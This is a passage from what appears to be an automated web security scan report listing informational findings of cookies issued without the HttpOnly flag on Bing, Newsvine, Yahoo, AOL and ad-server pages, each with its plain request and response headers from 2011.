NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:34:45 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.401. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:56:09 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl/ HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Date: Sun, 30 Jan 2011 01:51:09 GMT
Content-Length: 0
Set-Cookie: NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:56:09 GMT;path=/

17.402. http://toddkenreck.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://toddkenreck.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=c66a118e1fcbecd5b536a96e40929013; expires=Sat, 25-Jan-2031 02:57:39 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: toddkenreck.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.403. http://top.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://top.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=91e5bf02a7007c2a6827929e99162d52; expires=Sat, 25-Jan-2031 03:00:36 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: top.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.404. http://top.newsvine.com/users previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://top.newsvine.com
Path:	/users

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=a08b4d7ef3970ad6780f87b910dbac7c; expires=Sat, 25-Jan-2031 02:58:16 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /users HTTP/1.1
Host: top.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.405. http://tv.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.redacted
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=dfa3666ab2b24263815b585d8424c2c2; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: tv.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.406. http://tv.redacted/tv/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.redacted
Path:	/tv/article.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MC1=V=3&GUID=62ae4f15c8c0486a828bffcaa09140f2; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tv/article.aspx?news=625552&gt1=28103 HTTP/1.1
Host: tv.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.407. http://us.mc1125.mail.yahoo.com/mc/compose previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://us.mc1125.mail.yahoo.com
Path:	/mc/compose

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

B=eb61ua56k9fa0&b=3&s=19; expires=Tue, 29-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mc/compose HTTP/1.1
Host: us.mc1125.mail.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.408. http://redcated/CNT/iview/299297287/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/299297287/direct

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

AA002=001296343597-3954973; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.409. http://wbenedetti.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wbenedetti.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=37e0e82eb5225aaf39e58b2c59ea3714; expires=Sat, 25-Jan-2031 03:05:09 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: wbenedetti.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.410. http://webmail.aol.com/28200/aim/en-us/mail/compose-message.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.aol.com
Path:	/28200/aim/en-us/mail/compose-message.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Context=ver:3&sid:9e2a15e1-c5a7-4311-bdd6-07d5c021abea&rt:STANDARD&ckd:.mail.aol.com&ckp:%2f&ha:XjnLSPb%2fjfv6pCJfOQsdJbtdTfc%3d&; domain=.mail.aol.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /28200/aim/en-us/mail/compose-message.aspx HTTP/1.1
Host: webmail.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cat%3aSNS%7cld%3awebmail.aol.com%7crp%3amail%252fcompose-message.aspx%7cuv%3aAIM%7clc%3aen-us%7cmt%3aAIM%7csnt%3aScreenName%7csid%3a9e2a15e1-c5a7-4311-bdd6-07d5c021abea&offerId=newmail-en-us-v2&seamless=novl
Server: Microsoft-IIS/7.0
Set-Cookie: Context=ver:3&sid:9e2a15e1-c5a7-4311-bdd6-07d5c021abea&rt:STANDARD&ckd:.mail.aol.com&ckp:%2f&ha:XjnLSPb%2fjfv6pCJfOQsdJbtdTfc%3d&; domain=.mail.aol.com; path=/
P3P: CP="CURo TAIo IVAo IVDo ONL UNI COM NAV INT DEM STA OUR"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:22:12 GMT
Content-Length: 492

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLe
...[SNIP]...

17.411. http://www.bing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=116E16B4881F4F76A93BF81949677C2F; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca7a8f284da884884a06f8cb36768c20c; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.412. http://www.bing.com/challenge previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/challenge

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_FP=BDCE=129409675061634862&BDCEH=4B00CE098126B4CE6DFFB8D547F7B893; expires=Tue, 29-Jan-2013 17:11:46 GMT; domain=.bing.com; path=/
_HOP=I=1&TS=1296407506; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.413. http://www.bing.com/events/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/events/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=712D1F94FAED4E98B6E572C9C51BBEF4; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:30 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.414. http://www.bing.com/fd/ls/GLinkPing.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/fd/ls/GLinkPing.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=SM=1&MS=1621031&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:11:14 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.415. http://www.bing.com/fd/ls/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/fd/ls/l

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621031&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:11:10 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:11:10 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621031&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:11:10 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

17.416. http://www.bing.com/finance/stockscreener previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/finance/stockscreener

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=965375748DDD4D8188E499C867CEF5C8; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c03e263debce44bb8933c4855c834e0ea; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1620112&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.417. http://www.bing.com/images/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/images/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

IMGSCHUSR=scratchpad=0&details=1&BE=1; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/images
_SS=SID=284EF21770EF4BD0AA7FB9D61CA8CF78; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce493bb2b667d42a4bbbffd58ff8085dc; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.418. http://www.bing.com/local/ypdefault.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/local/ypdefault.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BID=234f29943060401f9ea3fd8c0fccd2b9; path=/local
CID=d7ba30d0ced2493187723ae5e97a11c0; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
CDate=1/29/2011 11:53:10 PM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
_SS=SID=9C78E9D32BAB47298AA4173498A90C8F; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:10 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce83ec72017dc49e5ac26803c481780a7; expires=Mon, 28-Jan-2013 23:53:10 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:10 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.419. http://www.bing.com/maps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=4FDEC46FE84D47C7A27357A4B60C2F21; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:04:44 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cb39404c1e43b486e8819f4088dc7362c; expires=Tue, 29-Jan-2013 17:04:44 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621024&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:04:44 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.420. http://www.bing.com/maps/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=A542DD3C69694894BF4BE6BD7321BB59; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:06:51 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca4184cfc9d4f4cccad735eb747233d7c; expires=Tue, 29-Jan-2013 17:06:51 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621026&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:06:51 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.421. http://www.bing.com/maps/explore/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/maps/explore/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=A21BB79701BC4D8A8674B6637A0C1148; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:06 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5a0f31712a284b0fb357b1ff693d5880; expires=Tue, 29-Jan-2013 17:07:06 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:06 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.422. http://www.bing.com/msnhomepagehistory.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/msnhomepagehistory.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=B16082EC97414E74BEA1ECA2227B02CA; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:31 GMT
Connection: close
Set-Cookie: _SS=SID=B16082EC97414E74BEA1ECA2227B02CA; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/

Ref A: 91E11ED41EDC42D491A070AAB3F6B959 Ref B: 2975312DDC5A4D916D738818AD098869 Ref C: Sat Jan 29 15:53:31 2011
PST

17.423. http://www.bing.com/news/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/news/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_HOP=I=1&TS=1296406958; domain=.bing.com; path=/
_SS=SID=555066E581BE46E4AA183A542A326C4A; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621022&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:02:38 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.424. http://www.bing.com/news/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/news/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=B97A28CBF38B449B9527EDAAE03B878F; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c635024954b6e4cedb19420ef37d99b0d; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621024&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.425. http://www.bing.com/news/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/news/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_HOP=I=1&TS=1296407026; domain=.bing.com; path=/
_SS=SID=67AD5B53D3DE451B9E64A941694B912C; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621023&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:03:46 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:03:46 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296407026; domain=.bing.com; path=/
Set-Cookie: _SS=SID=67AD5B53D3DE451B9E64A941694B912C; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621023&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:03:46 GMT; domain=.bing.com; path=/

17.426. http://www.bing.com/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_HOP=I=1&TS=1296345125; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.427. http://www.bing.com/sck previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/sck

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=8F56128DF29B4CAD864EBD862D193285; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:31 GMT
Connection: close
Set-Cookie: _SS=SID=8F56128DF29B4CAD864EBD862D193285; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/

Ref A: D0950E1EACE249D2BE0BE1B31B83ECCD Ref B: B9B3F609E20511FB646C8CF91E038C47 Ref C: Sat Jan 29 15:53:31 2011
PST

17.428. http://www.bing.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_HOP=I=1&TS=1296352332; domain=.bing.com; path=/
_SS=SID=CE537EFA8ED64BCEAACF15BE98BD87C5; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1620112&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 01:52:12 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.429. http://www.bing.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_FS=mkt=en-US; domain=.bing.com; path=/
_SS=SID=F92E124C97024B2EB73676F002B255BD; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:27 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:27 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _SS=SID=F92E124C97024B2EB73676F002B255BD; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:27 GMT; domain=.bing.com; path=/

Ref A: 6A237C8B92934F8E8A82206F4C282E05 Ref B: E54BF75E2FC67B06BF4FA201E1C9AABE Ref C: Sat Jan 29 15:53:27 2011
PST

17.430. http://www.bing.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/search/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_HOP=I=1&TS=1296352333; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/search
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 01:52:13 GMT
